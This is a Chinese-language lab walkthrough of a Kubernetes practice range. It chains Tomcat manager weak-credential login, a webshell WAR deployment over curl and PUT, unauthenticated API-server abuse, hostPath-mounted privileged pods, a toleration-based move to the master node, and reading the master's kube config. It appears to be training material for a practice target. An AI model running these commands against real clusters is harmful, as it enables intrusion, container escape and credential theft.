这里使用的是靓仔师傅的云安全靶场

一.WEB

进入后台

弱密码tomcat/tomcat进入后台http://192.168.139.134:32044/manager/html，但是无法直接部署war

上传webshell

利用tomcat 接口上传webshell

https://www.anquanke.com/post/id/223002?display=mobile#h3-4

• manager-gui：允许访问html页面接口(即URL路径为/manager/html/*)

• manager-script：允许访问纯文本接口(即URL路径为/manager/text/*)

• manager-jmx：允许访问JMX代理接口(即URL路径为/manager/jmxproxy/*)

• manager-status：允许访问Tomcat只读状态页面(即URL路径为/manager/status/*)

这里我们优先使用了manager-gui接口上传war包，可网页403失败了，于是使用第二种接口manager-script

curl

curl -T C:UsersAnonymousDesktopBehinder_v4.0.6serverwarshell.war "http://192.168.139.134:32044/manager/text/deploy?path=/shell&update=true" -u tomcat:tomcat

burpsuite

改成PUT方式也可以

URL路径：/manager/text/deploy?path=/hacker

PUT /manager/text/deploy?path=/hacker HTTP/1.1
Host: 192.168.139.134:32044
Content-Length: 1099
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Upgrade-Insecure-Requests: 1
Origin: http://192.168.139.134:32044
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53YRMlWM2mlPOZDV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.139.134:32044/manager/html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A2A0920F276F693C25F17DFA51B37242
Connection: close

------WebKitFormBoundary53YRMlWM2mlPOZDV
Content-Disposition: form-data; name="deployWar"; filename="hacker.war"
Content-Type: application/octet-stream

PK

连接webshell

二.内网

信息收集

获取到KUBERNETES_PORT=tcp://10.68.0.1:443

cdk方式

./cdk evaluate

存在api server未授权访问

查看pod

curl -k https://10.68.0.1:443/api/v1/namespaces/default/pods

cdk方式

./cdk kcurl anonymous get "https://10.68.0.1:443/api/v1/namespaces/default/pods?limit=500"

创建特权pod

#特权pod
cat > nginx-pod.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
 name: test-444
spec:
 containers:
 - name: test-444
   image: nginx:1.14.2
   volumeMounts:
   - name: host
     mountPath: /host
 volumes:
 - name: host
   hostPath:
     path: /
     type: Directory
EOF

#创建
curl -k https://10.68.0.1:443/api/v1/namespaces/default/pods -X POST --header 'content-type: application/yaml' --data-binary @nginx-pod.yaml

下载kubectl

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"

由于是非交互式，所以无法输入密码

所以更改命令

./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a get pods

• --server=https://10.68.0.1: 这个选项指定了Kubernetes API服务器的地址，其中https://10.68.0.1是API服务器的URL。

• --insecure-skip-tls-verify=true: 这个选项指示kubectl在与API服务器建立安全连接时跳过TLS证书验证。在本例中，设置为true意味着不验证TLS证书。

尝试查看token

./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a exec test-444 -- bash -c "ls -alh /host/root/.kube"

Taint

之前的操作横向到了另外一个node，没有token，尝试Taint横向到master

查看Taint

./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a describe nodes

创建pod

（因为格式错误所以第一次报错了）

#创建pod
cat > aaa.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
  name: control-master
spec:
 tolerations:
   - key: node.kubernetes.io/unschedulable
     operator: Exists
     effect: NoSchedule
 containers:
   - name: control-master-15
     image: ubuntu:18.04
     command: ["/bin/sleep", "3650d"]
     volumeMounts:
      - name: master
        mountPath: /master
 volumes:
  - name: master
    hostPath:
     path: /
     type: Directory
EOF

#创建容器
./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a create -f ./aaa.yaml

#查看
./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a get pods -o wide

cdk方式

https://github.com/cdk-team/CDK/wiki/Tool:-kcurl

cdk方式会直接横向到master

#POST
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"test-123","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test-123","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}n"},"name":"test-123","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test-123","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}

#url
https://10.68.0.1:443/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict

./cdk kcurl anonymous post 'https://10.68.0.1:443/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"test-444","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test-444","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}n"},"name":"test-444","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test-444","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}'

查看token

./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a exec control-master -- bash -c "cat /master/root/.kube/config"

原文始发于微信公众号（Relay学安全）：Kubernetes靶场